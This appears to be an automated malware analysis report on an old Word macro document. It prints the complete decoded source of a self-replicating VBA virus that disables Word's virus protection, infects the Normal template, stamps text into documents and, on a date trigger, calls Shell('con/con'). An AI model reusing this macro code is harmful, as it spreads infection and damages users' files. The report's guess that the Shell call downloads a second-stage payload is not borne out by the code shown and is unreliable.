Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 86cfc05069d67cbf…

MALICIOUS

Office (OLE)

Size: 27.5 KB
Created: 2001-05-01 15:07:00
Authoring application: Microsoft Word 8.0
First seen: 2012-06-14
MD5: 9691454b98e6718b176bfabe30da1a37
SHA-1: 4095afa62280d74936be933cea6c6ce4fabe9de4
SHA-256: 86cfc05069d67cbfbd4093812dcd6cce12491249b6209b713053aa16996ced1e
Risk Score: 160

Malware Insights

MITRE ATT&CK
  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1566.001 Phishing: Spearphishing Attachment

The sample contains a VBA macro that runs automatically via the Document_Open subroutine. The macro calls the Shell() function to execute a command, likely to download and run a second-stage payload. It also modifies the NormalTemplate (Normal.dot), potentially for persistence or to spread to other documents opened afterwards. The specific command executed is 'con/con', which is highly suspicious.

Heuristics (4)

  • VBA macros detected (severity: medium; 3 related findings) [OLE_VBA_MACROS]
    Document contains VBA macro code.
  • Shell() call in VBA (severity: critical) [OLE_VBA_SHELL]
    Shell() call in VBA.
  • Document_Open macro (severity: high) [OLE_VBA_DOCOPEN]
    Document_Open auto-execution macro.
  • VBA p-code auto-exec with execution tokens (severity: high) [OLE_VBA_PCODE_AUTOEXEC_EXEC]
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 5751 bytes
SHA-256: f670a460e7e1c0d3662ea6ac013c670428c66c40c1ec85211a8676c7997d1057

Script preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "Pecas"
Attribute VB_Base = "1Normal.Pecas"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
'morris
Private Sub Document_Open()
On Error Resume Next
Options.ConfirmConversions = (1 - 1): Options.VirusProtection = (1 - 1): Options.SaveNormalPrompt = (1 - 1)
Set nt = NormalTemplate.VBProject.VBComponents.Item(1)
Set ad = ActiveDocument.VBProject.VBComponents.Item(1)
pos = 3
x = "Private Sub Document_Open()"
paso2 = False
pasada:
cont = nt.CodeModule.CountOfLines
coad = ad.CodeModule.CountOfLines
If nt.CodeModule.lines(1, 1) <> "'morris" Then
nt.CodeModule.DeleteLines 1, cont
 If nt.Name <> "Pecas" Then
   nt.Name = "Pecas"
 End If
nt.CodeModule.AddFromString ("'morris")
 If paso2 = False Then
  nt.CodeModule.AddFromString ("Private Sub Document_Close()")
  nt.CodeModule.InsertLines pos, ad.CodeModule.lines(pos, coad)
 Else
  nt.CodeModule.AddFromString (x)
  nt.CodeModule.InsertLines pos, ad.CodeModule.lines(pos, coad)
   If InStr(1, ActiveDocument.Name, "Document") = False Then
    Selection.TypeText "Game´s over. morris Win......."
    ActiveDocument.SaveAs FileName:=ActiveDocument.FullName
   Else
    ActiveDocument.Saved = True
   End If
 End If
End If
If paso2 = True Then
  If Day(Now) = Minute(Now) Then
   ser$ = Shell("con/con", vbNormalFocus)
  End If
Exit Sub
Else
 paso2 = True
 Set ad = NormalTemplate.VBProject.VBComponents.Item(1)
 Set nt = ActiveDocument.VBProject.VBComponents.Item(1)
 GoTo pasada
End If
End Sub
'Made in Mexico by morris , te Amo Pecas IDyahoo m0rr1z

' Processing file: /opt/analyzer/scan_staging/8e7b09edfd534086b9f65df1add0eca8.bin
' ===============================================================================
' Module streams:
' Macros/VBA/Pecas - 3310 bytes
' Line #0:
' 	QuoteRem 0x0000 0x0006 "morris"
' Line #1:
' 	FuncDefn (Private Sub Document_Open())
' Line #2:
' 	OnError (Resume Next) 
' Line #3:
' 	LitDI2 0x0001 
' 	LitDI2 0x0001 
' 	Sub 
' 	Paren 
' 	Ld Options 
' 	MemSt ConfirmConversions 
' 	BoS 0x0000 
' 	LitDI2 0x0001 
' 	LitDI2 0x0001 
' 	Sub 
' 	Paren 
' 	Ld Options 
' 	MemSt VirusProtection 
' 	BoS 0x0000 
' 	LitDI2 0x0001 
' 	LitDI2 0x0001 
' 	Sub 
' 	Paren 
' 	Ld Options 
' 	MemSt SaveNormalPrompt 
' Line #4:
' 	SetStmt 
' 	LitDI2 0x0001 
' 	Ld NormalTemplate 
' 	MemLd VBProject 
' 	MemLd VBComponents 
' 	ArgsMemLd Item 0x0001 
' 	Set nt 
' Line #5:
' 	SetStmt 
' 	LitDI2 0x0001 
' 	Ld ActiveDocument 
' 	MemLd VBProject 
' 	MemLd VBComponents 
' 	ArgsMemLd Item 0x0001 
' 	Set ad 
' Line #6:
' 	LitDI2 0x0003 
' 	St pos 
' Line #7:
' 	LitStr 0x001B "Private Sub Document_Open()"
' 	St x 
' Line #8:
' 	LitVarSpecial (False)
' 	St paso2 
' Line #9:
' 	Label pasada 
' Line #10:
' 	Ld nt 
' 	MemLd CodeModule 
' 	MemLd CountOfLines 
' 	St cont 
' Line #11:
' 	Ld ad 
' 	MemLd CodeModule 
' 	MemLd CountOfLines 
' 	St coad 
' Line #12:
' 	LitDI2 0x0001 
' 	LitDI2 0x0001 
' 	Ld nt 
' 	MemLd CodeModule 
' 	ArgsMemLd lines 0x0002 
' 	LitStr 0x0007 "'morris"
' 	Ne 
' 	IfBlock 
' Line #13:
' 	LitDI2 0x0001 
' 	Ld cont 
' 	Ld nt 
' 	MemLd CodeModule 
' 	ArgsMemCall DeleteLines 0x0002 
' Line #14:
' 	Ld nt 
' 	MemLd New 
' 	LitStr 0x0005 "Pecas"
' 	Ne 
' 	IfBlock 
' Line #15:
' 	LitStr 0x0005 "Pecas"
' 	Ld nt 
' 	MemSt New 
' Line #16:
' 	EndIfBlock 
' Line #17:
' 	LitStr 0x0007 "'morris"
' 	Paren 
' 	Ld nt 
' 	MemLd CodeModule 
' 	ArgsMemCall AddFromString 0x0001 
' Line #18:
' 	Ld paso2 
' 	LitVarSpecial (False)
' 	Eq 
' 	IfBlock 
' Line #19:
' 	LitStr 0x001C "Private Sub Document_Close()"
' 	Paren 
' 	Ld nt 
' 	MemLd CodeModule 
' 	ArgsMemCall AddFromString 0x0001 
' Line #20:
' 	Ld pos 
' 	Ld pos 
' 	Ld coad 
' 	Ld ad 
' 	MemLd CodeModule 
' 	ArgsMemLd lines 0x0002 
' 	Ld nt 
' 	MemLd CodeModule 
' 	ArgsMemCall InsertLines 0x0002 
' Line #21:
' 	ElseBlock 
' Line #22:
' 	Ld x 
' 	Paren 
' 	Ld nt 
' 	MemLd CodeModule 
' 	ArgsMemCall AddFromString 0x0001 
' Line #23:
' 	Ld pos 
' 	Ld pos 
' 	
... (truncated)